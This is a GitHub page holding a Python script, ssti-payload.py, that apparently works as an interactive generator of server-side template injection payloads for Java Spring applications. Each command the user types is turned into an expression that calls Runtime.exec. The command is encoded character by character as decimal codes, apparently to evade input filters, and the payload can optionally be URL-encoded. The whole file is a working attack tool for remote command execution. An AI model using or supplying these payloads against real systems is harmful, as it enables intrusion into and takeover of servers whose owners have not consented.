-
Notifications
You must be signed in to change notification settings - Fork 18
/
Copy pathssti-payload.py
42 lines (32 loc) · 1.03 KB
/
ssti-payload.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!/usr/bin/python3
from cmd import Cmd
import urllib.parse, argparse
parser = argparse.ArgumentParser(description="Generate SSTI payloads... One character at a time.")
parser.add_argument("-u","--url-encode", action="store_true", help="URL Encode")
args = parser.parse_args()
url_encode=args.url_encode
class Terminal(Cmd):
prompt='\033[1;33mCommand ==>\033[0m '
def decimal_encode(self,args):
command=args
decimals=[]
for i in command:
decimals.append(str(ord(i)))
payload='''${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)''' % decimals[0]
for i in decimals[1:]:
line='.concat(T(java.lang.Character).toString({}))'.format(i)
payload+=line
payload+=').getInputStream())}'
if url_encode:
payload_encoded=urllib.parse.quote_plus(payload,safe='')
return payload_encoded
else:
return payload
def default(self,args):
print(self.decimal_encode(args))
print()
try:
term=Terminal()
term.cmdloop()
except KeyboardInterrupt:
quit()